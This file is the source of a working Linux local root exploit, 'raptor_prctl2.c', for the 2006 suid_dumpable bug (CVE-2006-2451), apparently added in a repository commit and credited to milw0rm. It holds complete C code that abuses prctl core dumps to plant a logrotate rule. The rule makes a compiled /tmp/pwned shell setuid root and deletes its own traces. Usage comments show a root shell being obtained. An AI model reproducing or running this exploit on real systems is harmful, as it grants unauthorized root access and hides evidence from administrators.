1+ /*
2+ * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
3+ *
4+ * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
5+ * Copyright (c) 2006 Marco Ivaldi <[email protected] > 6+ *
7+ * The suid_dumpable support in Linux kernel 2.6.13 up to versions before
8+ * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
9+ * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
10+ * the PR_SET_DUMPABLE argument of the prctl function and a program that causes
11+ * a core dump file to be created in a directory for which the user does not
12+ * have permissions (CVE-2006-2451).
13+ *
14+ * This exploit uses the logrotate attack vector: of course, you must be able
15+ * to chdir() into the /etc/logrotate.d directory in order to exploit the
16+ * vulnerability. I've experimented a bit with other attack vectors as well,
17+ * with no luck: at (/var/spool/atjobs/) uses file name information to
18+ * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x
19+ * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled
20+ * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
21+ *
22+ * Thanks to Solar Designer for the interesting discussion on attack vectors.
23+ *
24+ * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
25+ *
26+ * Usage:
27+ * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
28+ * [exploit must be statically linked]
29+ * $ ./raptor_prctl2
30+ * [please wait until logrotate is run]
31+ * $ ls -l /tmp/pwned
32+ * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned
33+ * $ /tmp/pwned
34+ * sh-3.00# id
35+ * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
36+ * sh-3.00#
37+ * [don't forget to delete /tmp/pwned!]
38+ *
39+ * Vulnerable platforms:
40+ * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
41+ */
42+
43+ #include <stdio.h>
44+ #include <unistd.h>
45+ #include <stdlib.h>
46+ #include <signal.h>
47+ #include <sys/stat.h>
48+ #include <sys/resource.h>
49+ #include <sys/prctl.h>
50+
51+ #define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
52+ #define INFO2 "Copyright (c) 2006 Marco Ivaldi <
[email protected] >"
53+
54+ char payload [] = /* commands to be executed by privileged logrotate */
55+ "\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n" ;
56+
57+ char pwnage [] = /* build setuid() helper to circumvent bash checks */
58+ "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c" ;
59+
60+ int main (void )
61+ {
62+ int pid ;
63+ struct rlimit corelimit ;
64+ struct stat st ;
65+
66+ /* print exploit information */
67+ fprintf (stderr , "%s\n%s\n\n" , INFO1 , INFO2 );
68+
69+ /* prepare the setuid() helper */
70+ system (pwnage );
71+
72+ /* set core size to unlimited */
73+ corelimit .rlim_cur = RLIM_INFINITY ;
74+ corelimit .rlim_max = RLIM_INFINITY ;
75+ setrlimit (RLIMIT_CORE , & corelimit );
76+
77+ /* let's create a fake logfile in /var/log */
78+ if (!(pid = fork ())) {
79+ chdir ("/var/log" );
80+ prctl (PR_SET_DUMPABLE , 2 );
81+ sleep (666 );
82+ exit (1 );
83+ }
84+ kill (pid , SIGSEGV );
85+
86+ /* let's do the PR_SET_DUMPABLE magic */
87+ if (!(pid = fork ())) {
88+ chdir ("/etc/logrotate.d" );
89+ prctl (PR_SET_DUMPABLE , 2 );
90+ sleep (666 );
91+ exit (1 );
92+ }
93+ kill (pid , SIGSEGV );
94+
95+ /* did it work? */
96+ sleep (3 );
97+ if ((stat ("/var/log/core" , & st ) < 0 ) ||
98+ (stat ("/etc/logrotate.d/core" , & st ) < 0 )) {
99+ fprintf (stderr , "Error: Not vulnerable? See comments.\n" );
100+ exit (1 );
101+ }
102+
103+ /* total pwnage */
104+ fprintf (stderr , "Please wait until logrotate is run and check /tmp/pwned;)\n" );
105+ exit (0 );
106+ }
107+
108+ // milw0rm.com [2006-07-18]
109+
0 commit comments